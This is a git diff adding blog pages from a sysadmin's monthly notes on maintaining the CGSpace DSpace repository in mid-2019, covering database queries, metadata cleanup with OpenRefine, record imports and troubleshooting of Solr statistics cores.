+<li>Export new list of all authors from CGSpace database to send to Peter:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-05-27-all-authors.csv with csv header;
+COPY 64871
+</code></pre><ul>
+<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
+<li>Paola from CIAT asked for a way to generate a report of the top keywords for each year of their articles and journals
+<ul>
+<li>I told them that the best way (even though it&rsquo;s low tech) is to work on a CSV dump of the collection</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-05-29">2019-05-29</h2>
+<ul>
+<li>A CIMMYT user was having problems registering or logging into CGSpace
+<ul>
+<li>I tried to register her and it gave an error, then I remembered for CGIAR LDAP users we actually need to just log in and it will automatically create an eperson</li>
+<li>I told her to try to log in with the LDAP login method and let me know what happens (then I can look in the logs too)</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-05-30">2019-05-30</h2>
+<ul>
+<li>I see the following error in the DSpace log when the user tries to log in with her CGIAR email and password on the LDAP login:</li>
+</ul>
+<pre tabindex="0"><code>2019-05-30 07:19:35,166 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=A5E0C836AF8F3ABB769FE47107AE1CFF:ip_addr=185.71.4.34:failed_login:no DN found for user sa.saini@cgiar.org
+</code></pre><ul>
+<li>For now I just created an eperson with her personal email address until I have time to check LDAP to see what&rsquo;s up with her CGIAR account:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace user -a -m blah@blah.com -g Sakshi -s Saini -p &#39;sknflksnfksnfdls&#39;
+</code></pre><!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2019-06/index.html b/docs/2019-06/index.html
new file mode 100644
index 000000000..0cb3dd632
--- /dev/null
+++ b/docs/2019-06/index.html
@@ -0,0 +1,371 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="June, 2019" />
+<meta property="og:description" content="2019-06-02
+
+Merge the Solr filterCache and XMLUI ISI journal changes to the 5_x-prod branch and deploy on CGSpace
+Run system updates on CGSpace (linode18) and reboot it
+
+2019-06-03
+
+Skype with Marie-Angélique and Abenet about CG Core v2
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-06/" />
+<meta property="article:published_time" content="2019-06-02T10:57:51+03:00" />
+<meta property="article:modified_time" content="2019-10-28T13:39:25+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="June, 2019"/>
+<meta name="twitter:description" content="2019-06-02
+
+Merge the Solr filterCache and XMLUI ISI journal changes to the 5_x-prod branch and deploy on CGSpace
+Run system updates on CGSpace (linode18) and reboot it
+
+2019-06-03
+
+Skype with Marie-Angélique and Abenet about CG Core v2
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "June, 2019",
+  "url": "https://alanorth.github.io/cgspace-notes/2019-06/",
+  "wordCount": "1057",
+  "datePublished": "2019-06-02T10:57:51+03:00",
+  "dateModified": "2019-10-28T13:39:25+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2019-06/">
+
+    <title>June, 2019 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-06/">June, 2019</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2019-06-02T10:57:51+03:00">Sun Jun 02, 2019</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-06-02">2019-06-02</h2>
+<ul>
+<li>Merge the <a href="https://github.com/ilri/DSpace/pull/425">Solr filterCache</a> and <a href="https://github.com/ilri/DSpace/pull/426">XMLUI ISI journal</a> changes to the <code>5_x-prod</code> branch and deploy on CGSpace</li>
+<li>Run system updates on CGSpace (linode18) and reboot it</li>
+</ul>
+<h2 id="2019-06-03">2019-06-03</h2>
+<ul>
+<li>Skype with Marie-Angélique and Abenet about <a href="https://agriculturalsemantics.github.io/cg-core/cgcore.html">CG Core v2</a></li>
+</ul>
+<ul>
+<li>Here is a list of proposed metadata migrations for CGSpace
+<ul>
+<li>dc.language.iso→DCTERMS.language (and switch to ISO 639-2 Alpha 3)</li>
+<li>dc.description.abstract→DCTERMS.abstract</li>
+<li>dc.identifier.citation→DCTERMS.bibliographicCitation</li>
+<li>dc.contributor.author→DCTERMS.creator (for people)</li>
+<li>dc.description.sponsorship→cg.contributor.donor (values from CrossRef or Grid.ac if possible)</li>
+<li>dc.rights→DCTERMS.license</li>
+<li>cg.identifier.status→DCTERMS.accessRights (values &ldquo;open&rdquo; or &ldquo;restricted&rdquo;)</li>
+<li>cg.creator.id→cg.creator.identifier?</li>
+<li>dc.relation.ispartofseries→DCTERMS.isPartOf</li>
+<li>cg.link.relation→DCTERMS.relation</li>
+</ul>
+</li>
+<li>Marie agreed that we need to adopt some controlled lists for our values, and pointed out that the MARLO team maintains a list of CRPs and Centers at <a href="https://clarisa.cgiar.org/">CLARISA</a>
+<ul>
+<li>There is an API there but it needs a password for access&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-06-04">2019-06-04</h2>
+<ul>
+<li>The MARLO team responded and said they will give us access to the CLARISA API</li>
+<li>Marie-Angélique <a href="https://github.com/AgriculturalSemantics/cg-core/pull/1">proposed</a> to integrate <code>dcterms.isPartOf</code>, <code>dcterms.abstract</code>, and <code>dcterms.bibliographicCitation</code> into the CG Core v2 schema
+<ul>
+<li>I told her I would attempt to integrate those and the others above into DSpace Test soon and report back</li>
+<li>We also need to discuss with the ILRI Data Portal, MEL/MELSpace, and users who consume the CGSpace API</li>
+</ul>
+</li>
+<li>Add Arabic language to input-forms.xml (<a href="https://github.com/ilri/DSpace/pull/427">#427</a>), as Bioversity is adding some Arabic items and noticed it missing</li>
+</ul>
+<h2 id="2019-06-05">2019-06-05</h2>
+<ul>
+<li>Send mail to CGSpace and MELSpace people to let them know about the proposed metadata field migrations after the discussion with Marie-Angélique</li>
+</ul>
+<h2 id="2019-06-07">2019-06-07</h2>
+<ul>
+<li>Thierry noticed that the CUA statistics were missing previous years again, and I see that the Solr admin UI has the following message:</li>
+</ul>
+<pre tabindex="0"><code>statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher 
+</code></pre><ul>
+<li>I had to restart Tomcat a few times for all the stats cores to get loaded with no issue</li>
+</ul>
+<h2 id="2019-06-10">2019-06-10</h2>
+<ul>
+<li>Rename the AReS repository on GitHub to OpenRXV: <a href="https://github.com/ilri/OpenRXV">https://github.com/ilri/OpenRXV</a></li>
+<li>Create a new AReS repository: <a href="https://github.com/ilri/AReS">https://github.com/ilri/AReS</a></li>
+<li>Start looking at the 203 IITA records on DSpace Test from last month (<a href="https://dspacetest.cgiar.org/handle/10568/102032">IITA_May_16</a> aka &ldquo;20194th.xls&rdquo;) using OpenRefine
+<ul>
+<li>Trim leading, trailing, and consecutive whitespace on all columns, but I didn&rsquo;t notice very many issues</li>
+<li>Validate affiliations against latest list of top 1500 terms using reconcile-csv, correcting and standardizing about twenty-seven</li>
+<li>Validate countries against latest list of countries using reconcile-csv, correcting three</li>
+<li>Convert all DOIs to &ldquo;<a href="https://dx.doi.org">https://dx.doi.org</a>&rdquo; format</li>
+<li>Normalize all <code>cg.identifier.url</code> Google book fields to &ldquo;books.google.com&rdquo;</li>
+<li>Correct some inconsistencies in IITA subjects</li>
+<li>Correct two incorrect &ldquo;Peer Review&rdquo; in <code>dc.description.version</code></li>
+<li>About fifteen items have incorrect ISBNs (looks like an Excel error because the values look like scientific numbers)</li>
+<li>Delete one blank item</li>
+<li>I managed to get to subjects, so I&rsquo;ll continue from there when I start working next</li>
+</ul>
+</li>
+<li>Generate a new list of countries from the database for use with reconcile-csv
+<ul>
+<li>After dumping, use csvcut to add line numbers, then change the csv header to match those you use in reconcile-csv, for example <code>id</code> and <code>name</code>:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 228 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC) to /tmp/countries.csv WITH CSV HEADER
+COPY 192
+$ csvcut -l -c 0 /tmp/countries.csv &gt; 2019-06-10-countries.csv
+</code></pre><ul>
+<li>Get a list of all the unique AGROVOC subject terms in IITA&rsquo;s data and export it to a text file so I can validate them with my <code>agrovoc-lookup.py</code> script:</li>
+</ul>
+<pre tabindex="0"><code>$ csvcut -c dc.subject ~/Downloads/2019-06-10-IITA-20194th-Round-2.csv| sed &#39;s/||/\n/g&#39; | grep -v dc.subject | sort -u &gt; iita-agrovoc.txt
+$ ./agrovoc-lookup.py -i iita-agrovoc.txt -om iita-agrovoc-matches.txt -or iita-agrovoc-rejects.txt
+$ wc -l iita-agrovoc*
+  402 iita-agrovoc-matches.txt
+   29 iita-agrovoc-rejects.txt
+  431 iita-agrovoc.txt
+</code></pre><ul>
+<li>Combine these IITA matches with the subjects I matched a few months ago:</li>
+</ul>
+<pre tabindex="0"><code>$ csvcut -c name 2019-03-18-subjects-matched.csv | grep -v name | cat - iita-agrovoc-matches.txt | sort -u &gt; 2019-06-10-subjects-matched.txt
+</code></pre><ul>
+<li>Then make a new list to use with reconcile-csv by adding line numbers with csvcut and changing the line number header to <code>id</code>:</li>
+</ul>
+<pre tabindex="0"><code>$ csvcut -c name -l 2019-06-10-subjects-matched.txt | sed &#39;s/line_number/id/&#39; &gt; 2019-06-10-subjects-matched.csv
+</code></pre><h2 id="2019-06-20">2019-06-20</h2>
+<ul>
+<li>Share some feedback about AReS v2 with the colleagues and encourage them to do the same</li>
+</ul>
+<h2 id="2019-06-23">2019-06-23</h2>
+<ul>
+<li>Continue work on reviewing CG Core v2 standard and its implications to CGSpace an DSpace platforms in general
+<ul>
+<li>Update my <a href="https://gist.github.com/alanorth/2db39e91f48d116e00a4edffd6ba6409">list of fields to migrate</a></li>
+<li>Submit an <a href="https://github.com/AgriculturalSemantics/cg-core/issues/2">issue with my feedback to the CG Core project</a></li>
+</ul>
+</li>
+<li>Update my local PostgreSQL container:</li>
+</ul>
+<pre tabindex="0"><code>$ podman pull docker.io/library/postgres:9.6-alpine
+$ podman rm dspacedb
+$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+</code></pre><h2 id="2019-06-25">2019-06-25</h2>
+<ul>
+<li>Normalize <code>text_lang</code> values for metadata on DSpace Test and CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;ethnob&#39;, &#39;en&#39;, &#39;*&#39;, &#39;E.&#39;, &#39;&#39;);
+UPDATE 1551
+dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
+UPDATE 2070
+dspace=# UPDATE metadatavalue SET text_lang=&#39;es_ES&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;es&#39;, &#39;spa&#39;);
+UPDATE 2
+</code></pre><ul>
+<li>Upload 202 IITA records from earlier this month (20194th.xls) to CGSpace</li>
+<li>Communicate with Bioversity contractor in charge of their migration from Typo3 to CGSpace</li>
+</ul>
+<h2 id="2019-06-28">2019-06-28</h2>
+<ul>
+<li>Start looking at the fifty-seven AfricaRice records sent by Ibnou earlier this month
+<ul>
+<li>First, I see there are several items with type &ldquo;Book&rdquo; and &ldquo;Book Chapter&rdquo; should go in an &ldquo;AfricaRice books and book chapters&rdquo; collection, but none exists in the AfricaRice community</li>
+<li>Trim and collapse consecutive whitespace on author, affiliation, authorship types, title, subjects, doi, issn, source, citation, country, sponsors</li>
+<li>Standardize and correct affiliations like &ldquo;Africa Rice Cente&rdquo; and &ldquo;Africa Rice Centre&rdquo;, including syntax errors with multi-value separators</li>
+<li>Lots of variation in affiliations, for example:
+<ul>
+<li>Université Abomey-Calavi</li>
+<li>Université d&rsquo;Abomey</li>
+<li>Université d&rsquo;Abomey Calavi</li>
+<li>Université d&rsquo;Abomey-Calavi</li>
+<li>University of Abomey-Calavi</li>
+</ul>
+</li>
+<li>Validate and normalize affiliations against our 2019-04 list using reconcile-csv and OpenRefine:
+<ul>
+<li><code>$ lein run ~/src/git/DSpace/2019-04-08-affiliations.csv name id</code></li>
+<li>I always forget how to copy the reconciled values in OpenRefine, but you need to make a new colume and populate it using this GREL: <code>if(cell.recon.matched, cell.recon.match.name, value)</code></li>
+</ul>
+</li>
+<li>Replace smart quotes with standard ASCII ones</li>
+<li>Fix typos in authoriship types</li>
+<li>Validate and normalize subjects against our 2019-06 list using reconcile-csv and OpenRefine:
+<ul>
+<li><code>$ lein run ~/src/git/DSpace/2019-06-10-subjects-matched.csv name id</code></li>
+<li>Also add about 30 new AGROVOC subjects to our list that I verified manually</li>
+</ul>
+</li>
+<li>There is one duplicate, both have the same DOI: <a href="https://doi.org/10.1016/j.agwat.2018.06.018">https://doi.org/10.1016/j.agwat.2018.06.018</a></li>
+<li>Fix four ISBNs that were in the ISSN field</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-06-30">2019-06-30</h2>
+<ul>
+<li>Upload fifty-seven AfricaRice records to <a href="https://dspacetest.cgiar.org/handle/10568/102274">DSpace Test</a>
+<ul>
+<li>I created the SAF bundler with SAFBuilder and then imported via the CLI:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ dspace import -a -e me@cgiar.org -m 2019-06-30-AfricaRice-11to73.map -s /tmp/2019-06-30-AfricaRice-11to73
+</code></pre><ul>
+<li>I sent feedback about a few missing PDFs and one duplicate to Ibnou to check</li>
+<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2019-07/index.html b/docs/2019-07/index.html
new file mode 100644
index 000000000..78fafa378
--- /dev/null
+++ b/docs/2019-07/index.html
@@ -0,0 +1,608 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="July, 2019" />
+<meta property="og:description" content="2019-07-01
+
+Create an &ldquo;AfricaRice books and book chapters&rdquo; collection on CGSpace for AfricaRice
+Last month Sisay asked why the following &ldquo;most popular&rdquo; statistics link for a range of months in 2018 works for the CIAT community on DSpace Test, but not on CGSpace:
+
+DSpace Test
+CGSpace
+
+
+Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-07/" />
+<meta property="article:published_time" content="2019-07-01T12:13:51+03:00" />
+<meta property="article:modified_time" content="2019-10-28T13:39:25+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="July, 2019"/>
+<meta name="twitter:description" content="2019-07-01
+
+Create an &ldquo;AfricaRice books and book chapters&rdquo; collection on CGSpace for AfricaRice
+Last month Sisay asked why the following &ldquo;most popular&rdquo; statistics link for a range of months in 2018 works for the CIAT community on DSpace Test, but not on CGSpace:
+
+DSpace Test
+CGSpace
+
+
+Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "July, 2019",
+  "url": "https://alanorth.github.io/cgspace-notes/2019-07/",
+  "wordCount": "2330",
+  "datePublished": "2019-07-01T12:13:51+03:00",
+  "dateModified": "2019-10-28T13:39:25+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2019-07/">
+
+    <title>July, 2019 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-07/">July, 2019</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2019-07-01T12:13:51+03:00">Mon Jul 01, 2019</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-07-01">2019-07-01</h2>
+<ul>
+<li>Create an &ldquo;AfricaRice books and book chapters&rdquo; collection on CGSpace for AfricaRice</li>
+<li>Last month Sisay asked why the following &ldquo;most popular&rdquo; statistics link for a range of months in 2018 works for the CIAT community on DSpace Test, but not on CGSpace:
+<ul>
+<li><a href="https://dspacetest.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;time_filter_end_date=01%2F12%2F2018">DSpace Test</a></li>
+<li><a href="https://cgspace.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;time_filter_end_date=01%2F12%2F2018">CGSpace</a></li>
+</ul>
+</li>
+<li>Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community</li>
+</ul>
+<ul>
+<li>If I change the parameters to 2019 I see stats, so I&rsquo;m really thinking it has something to do with the sharded yearly Solr statistics cores
+<ul>
+<li>I checked the Solr admin UI and I see all Solr cores loaded, so I don&rsquo;t know what it could be</li>
+<li>When I check the Atmire content and usage module it seems obvious that there is a problem with the old cores because I dont have anything before 2019-01</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2019/07/atmire-cua-2018-missing.png" alt="Atmire CUA 2018 stats missing"></p>
+<ul>
+<li>I don&rsquo;t see anyone logged in right now so I&rsquo;m going to try to restart Tomcat and see if the stats are accessible after Solr comes back up</li>
+<li>I decided to run all system updates on the server (linode18) and reboot it
+<ul>
+<li>After rebooting Tomcat came back up, but the the Solr statistics cores were not all loaded</li>
+<li>The error is always (with a different core):</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2010&#39;: Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
+</code></pre><ul>
+<li>I restarted Tomcat <em>ten times</em> and it never worked&hellip;</li>
+<li>I tried to stop Tomcat and delete the write locks:</li>
+</ul>
+<pre tabindex="0"><code># systemctl stop tomcat7
+# find /dspace/solr/statistics* -iname &#34;*.lock&#34; -print -delete
+/dspace/solr/statistics/data/index/write.lock
+/dspace/solr/statistics-2010/data/index/write.lock
+/dspace/solr/statistics-2011/data/index/write.lock
+/dspace/solr/statistics-2012/data/index/write.lock
+/dspace/solr/statistics-2013/data/index/write.lock
+/dspace/solr/statistics-2014/data/index/write.lock
+/dspace/solr/statistics-2015/data/index/write.lock
+/dspace/solr/statistics-2016/data/index/write.lock
+/dspace/solr/statistics-2017/data/index/write.lock
+/dspace/solr/statistics-2018/data/index/write.lock
+# find /dspace/solr/statistics* -iname &#34;*.lock&#34; -print -delete
+# systemctl start tomcat7
+</code></pre><ul>
+<li>But it still didn&rsquo;t work!</li>
+<li>I stopped Tomcat, deleted the old locks, and will try to use the &ldquo;simple&rdquo; lock file type in <code>solr/statistics/conf/solrconfig.xml</code>:</li>
+</ul>
+<pre tabindex="0"><code>&lt;lockType&gt;${solr.lock.type:simple}&lt;/lockType&gt;
+</code></pre><ul>
+<li>And after restarting Tomcat it still doesn&rsquo;t work</li>
+<li>Now I&rsquo;ll try going back to &ldquo;native&rdquo; locking with <code>unlockAtStartup</code>:</li>
+</ul>
+<pre tabindex="0"><code>&lt;unlockOnStartup&gt;true&lt;/unlockOnStartup&gt;
+</code></pre><ul>
+<li>Now the cores seem to load, but I still see an error in the Solr Admin UI and I still can&rsquo;t access any stats before 2018</li>
+<li>I filed an <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=685">issue with Atmire</a>, so let&rsquo;s see if they can help</li>
+<li>And since I&rsquo;m annoyed and it&rsquo;s been a few months, I&rsquo;m going to move the JVM heap settings that I&rsquo;ve been testing on DSpace Test to CGSpace</li>
+<li>The old ones were:</li>
+</ul>
+<pre tabindex="0"><code>-Djava.awt.headless=true -Xms8192m -Xmx8192m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=5400 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false
+</code></pre><ul>
+<li>And the new ones come from Solr 4.10.x&rsquo;s startup scripts:</li>
+</ul>
+<pre tabindex="0"><code>    -Djava.awt.headless=true
+    -Xms8192m -Xmx8192m
+    -Dfile.encoding=UTF-8
+    -XX:NewRatio=3
+    -XX:SurvivorRatio=4
+    -XX:TargetSurvivorRatio=90
+    -XX:MaxTenuringThreshold=8
+    -XX:+UseConcMarkSweepGC
+    -XX:+UseParNewGC
+    -XX:ConcGCThreads=4 -XX:ParallelGCThreads=4
+    -XX:+CMSScavengeBeforeRemark
+    -XX:PretenureSizeThreshold=64m
+    -XX:+UseCMSInitiatingOccupancyOnly
+    -XX:CMSInitiatingOccupancyFraction=50
+    -XX:CMSMaxAbortablePrecleanTime=6000
+    -XX:+CMSParallelRemarkEnabled
+    -XX:+ParallelRefProcEnabled
+    -Dcom.sun.management.jmxremote
+    -Dcom.sun.management.jmxremote.port=1337
+    -Dcom.sun.management.jmxremote.ssl=false
+    -Dcom.sun.management.jmxremote.authenticate=false
+</code></pre><h2 id="2019-07-02">2019-07-02</h2>
+<ul>
+<li>Help upload twenty-seven posters from the 2019-05 Sharefair to CGSpace
+<ul>
+<li>Sisay had already done the SAFBundle so I did some minor corrections to and uploaded them to a temporary collection so I could check them in OpenRefine:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ sed -i &#39;s/CC-BY 4.0/CC-BY-4.0/&#39; item_*/dublin_core.xml
+$ echo &#34;10568/101992&#34; &gt;&gt; item_*/collections
+$ dspace import -a -e me@cgiar.org -m 2019-07-02-Sharefair.map -s /tmp/Sharefair_mapped
+</code></pre><ul>
+<li>I noticed that all twenty-seven items had double dates like &ldquo;2019-05||2019-05&rdquo; so I fixed those, but the rest of the metadata looked good so I unmapped them from the temporary collection</li>
+<li>Finish looking at the fifty-six AfricaRice items and upload them to CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace import -a -e me@cgiar.org -m 2019-07-02-AfricaRice-11to73.map -s /tmp/SimpleArchiveFormat
+</code></pre><ul>
+<li>Peter pointed out that the Sharefair dates I fixed were not actually fixed
+<ul>
+<li>It seems there is a bug that causes DSpace to not detect changes if the values are the same like &ldquo;2019-05||2019-05&rdquo; and you try to remove one</li>
+<li>To get it to work I had to change some of them to 2019-01, then remove them</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-07-03">2019-07-03</h2>
+<ul>
+<li>Atmire responded about the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=685">Solr issue</a> and said they would be willing to help</li>
+</ul>
+<h2 id="2019-07-04">2019-07-04</h2>
+<ul>
+<li>Maria Garruccio sent me some new ORCID identifiers for Bioversity authors
+<ul>
+<li>I combined them with our existing list and then used my <code>resolve-orcids.py</code> script to update the names from ORCID.org:</li>
+</ul>
